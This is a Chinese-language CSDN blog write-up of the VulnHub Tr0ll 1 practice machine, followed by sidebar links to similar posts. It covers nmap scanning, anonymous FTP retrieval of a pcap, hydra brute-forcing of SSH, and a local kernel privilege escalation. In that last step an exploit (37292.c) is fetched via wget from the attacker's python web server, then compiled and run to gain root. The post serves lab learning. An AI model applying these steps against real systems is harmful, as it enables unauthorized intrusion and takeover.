Tr0ll

已于 2023-08-06 02:58:41 修改
阅读量61 收藏
点赞数
分类专栏: vulnhub 文章标签: linux 网络安全 web安全
于 2023-08-06 02:57:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandasaymmm/article/details/132126805
版权

一、nmap扫描

 先nmap扫一下靶机开放的端口

nmap --min-rate 10000 -p- 192.168.230.142

 

再用nmap获取更多的信息

    sudo nmap -p- -sS -sV -A 192.168.230.142

 可以看到ftp有一个lol.pcap的文件

二、web服务器

里面啥都没有

 三、分析lol.pcap

匿名登录ftp然后下载lol.pcap

get lol.pcap

追踪tcp流发现了个啥

追踪eq 2流量发现了sup3rs3cr3tdirlol

尝试在web访问一下这个

 下载完运行一下

再去web那看看这个

 先看一眼包含密码的文件夹

Ps:真的离谱啊,密码就是Pass.txt不是里面的goodjob·····

保存文件然后用hydra进行爆破

四、提权

ssh登录

uname -a看看系统

然后sudo -l看看,发现不太行

用searchsploit查找系统版本找到相对应的漏洞

 开启python的web服务,靶机下载exp

python -m http.server 2333
wget http://192.168.230.141:2333/37292.c

 

然后编译运行

 拿到root

熊猫叫喵喵喵
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tr0ll靶机练习
SYJ_361的博客
03-27 2927
本文是对Tr0ll靶机的练习,利用ftp漏洞进行远程登录,利用python生成反弹shell的脚本,并通过远程进行下载,并对靶机进行提权,最终获得root权限
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
[VulnHub靶机渗透] Tr0ll
人若无名,便可专心练剑
05-19 715
靶机精讲之Tr0ll ,vulnhub靶机,没有大招,但都是不可或缺的小技巧。用到FTP的使用技巧、File命令、binwalk命令、strings命令、Wireshark包文件、黑丝(黑客思路)、Leetspeak、Crackmapexec、hydra、Find命令技巧、系统命令。
渗透测试靶机---Tr0ll
久恙502的博客
10-28 351
渗透测试,打靶经历记录,大佬多多指点,谢谢!
vulnhub Tr0ll: 2
箭雨镜屋
12-30 2380
本文思路: nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0ur_self---->访问y0ur_self目录,获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录,得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权
vulnhub靶场- Tr0ll靶场
zzzzzzkeai的博客
11-27 713
vulnhub靶场--Tr0ll:1靶场
VulnHub靶机-Tr0ll
Slow_的博客
02-23 406
VulnHub靶机-Tr0ll 下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.165 文章目录VulnHub靶机-Tr0ll信息搜集二、内核提权 信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.8.0/24 发现靶机IP为192.168.8
vulnhub靶机Tr0ll渗透笔记
liver100day的博客
06-08 776
Tr0ll靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:Tr0ll IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 1.2 端口扫描(masscan或nmap) messcan --rate=100000 -p 0-65535 192.168.75.147
vulnhub靶机Tr0ll:1渗透笔记
weixin_52268949的博客
03-12 5227
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信息收集 首先通过nmap扫描靶机ip地址 nmap -sP 192.168.20.0/24 确定靶机ip 扫描开放端口 nmap -sV 192.168.20.129 发现21 和80 端口可能有用我们先来看看80端口 并没有发现什么信息我们使用dirb扫描一下目录 dirb http://192.1
渗透项目(四):Tr0ll
Ays.Ie的博客
10-27 1425
本文记录作者第4个渗透项目,希望对渗透感兴趣的同学有所帮助,随后还会更新一些其他工具使用的文章
tr0ll2.docx
07-04
tr0ll2.docx
LSM6DS3TR-C官网例程
04-13
这两种通信方式都需要在STM32的HAL库或LL库中配置相应的初始化函数,然后调用读写函数进行数据交换。 开发过程中,我们还需要关注传感器数据的处理。例如,从LSM6DS3TR-C获取的数据是原始的二进制值,需要进行温度...
LL(1)语法分析器
01-01
### LL(1)语法分析器知识点解析 #### 一、LL(1)语法分析器简介 LL(1)分析器是一种自顶向下(top-down)的语法分析方法,它基于预测分析的思想来处理文法,其核心是构建一个预测分析表,并通过这个表来进行语法分析。...
编译原理的语法分析——LL(1)分析表的实现.docx
12-04
《编译原理》的实验报告主要探讨了LL(1)语法分析,这是一种自顶向下的解析方法,适用于构造编译器的语法分析阶段。实验旨在加深对LL(1)分析方法的理解,包括文法等价变换、LL(1)分析表的构造以及输入串的分析过程。 ...
Linux 定时任务
flash的博客
08-14 374
Linux系统中,cron是一个广泛使用的定时任务工具,允许用户安排周期性执行的任务(脚本或命令)。cron守护进程(crond)会读取配置文件(通常位于/etc/crontab),并根据这些配置文件中指定的时间规则来执行相应的任务。
linux开启RNDIS,实现虚拟网卡
轩辕霸天L
08-15 445
首先要 `make clean`,清空之前的编译结果。
linux HBA驱动中scsi_host_template .shost_attrs
Wang20122013的博客
08-13 514
scsi_host_template是一个结构体,用于定义SCSI主机(host adapter)的属性和操作。这个模板用于初始化SCSI主机结构体scsi_host_template,它包含了主机的属性、操作函数等。shost_attrs是scsi_host_template结构体中的一个成员,它是一个属性组,用于定义SCSI主机可以支持的属性。每个属性都会有相应的操作函数,这些函数定义了如何读取或写入属性值。例如,一个属性可能有一个show函数来返回当前值,一个store函数来设置新值。
Linux Xfce 桌面环境系统休眠的问题
最新发布
Wynter
08-17 276
通过这些步骤,你应该能够解决 Xfce 桌面环境中的系统休眠问题。如果问题仍然存在,可能需要进一步检查硬件兼容性或寻求更专业的技术支持。确保你的硬件驱动程序正确支持电源管理功能。特别是对于笔记本电脑,显卡和电池驱动程序的兼容性非常重要。确保你的系统上运行着正确的电源管理守护进程。在大多数现代 Linux 发行版中,这通常是。查看系统日志可能会提供一些关于为什么系统进入休眠状态的线索。如果你暂时不需要系统休眠功能,可以禁用它。
LL: LCALL DISP JB P3.4,LL SETB TR0 CLR P1.6 Q2: MOV R4,#20 Q1: MOV TH0,#3CH MOV TL0,#0B0H Q0: JB P3.5,L2 MOV 70H,#1 SETB P1.6 SJMP NEXT L2: JB P3.6,L3 MOV 70H,#2 SETB P1.6 SJMP NEXT L3: JB P3.7,L4 MOV 70H,#3 SETB P1.6 SJMP NEXT L4: LCALL DISP JNB TF0,Q0 CLR TF0 DJNZ R4,Q1 INC 72H MOV A,72H CJNE A,#10,Q2 SETB P2.1 MOV R4,#100
06-01
- SETB TR0 将定时器0的运行控制位置为1,表示定时器0开始工作 - CLR P1.6 将单片机P1.6引脚的电平置低 - MOV R4,#20 将20存储到R4寄存器中 - MOV TH0,#3CH 将0x3C存储到TH0寄存器中,表示定时器0的初值为60 - MOV ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值